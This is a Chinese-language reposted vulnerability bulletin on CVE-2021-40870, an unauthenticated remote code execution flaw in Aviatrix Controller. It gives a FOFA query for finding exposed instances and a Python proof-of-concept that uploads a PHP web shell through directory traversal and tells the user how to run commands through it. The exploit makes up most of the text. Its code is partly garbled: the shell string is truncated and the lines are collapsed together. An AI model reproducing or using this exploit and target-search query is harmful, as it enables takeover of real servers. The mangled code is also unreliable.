新洞!CVE-2021-40870 Aviatrix-Controller 远程代码执行Getshell

洞悉安全,风洞网,认准官方网站!
新洞!CVE-2021-40870 Aviatrix-Controller 远程代码执行Getshell_第1张图片


FOFA语法:app="Aviatrix-Controller"
新洞!CVE-2021-40870 Aviatrix-Controller 远程代码执行Getshell_第2张图片
CVE-2021-40870 漏洞利用

在 6.5-1804.1922 之前的 Aviatrix Controller 6.x 中发现了一个问题。可以不受限制地上传具有危险类型的文件,这允许未经身份验证的用户通过目录遍历执行任意代码。

POC

def poc_attack(url):
    try:
        url = url + "/"
 
        filename = "RCE.php"
        shell = '''cmd'])){ echo "
"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "
"; die; }?>'
'' if url.startswith('https://'): k = url.replace("https://", "") if k.endswith("/"): p = k.replace("/", "") user = '''Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36''' headers = { "Host": p, "User-Agent": user, "Connection": "close", "Content-Length": "109", "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip", } body = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{filename}&data=poc by agun{shell}' r = requests.post(url + '/v1/backend1', headers=headers, data=body, verify=False) check_file = requests.get(url + '/v1/' + filename, verify=False) if check_file.status_code == 200: print(f'EXPLOITED {url}') print('') print(f'Go To {url}/v1/{filename}') print('') print('access shell using RCE.php?cmd=[command]') except Exception as err: pass

原POC利用Github公布地址:https://github.com/0xAgun/CVE-2021-40870

你可能感兴趣的:(风洞网转载,php,python,安全漏洞,shell,网络安全)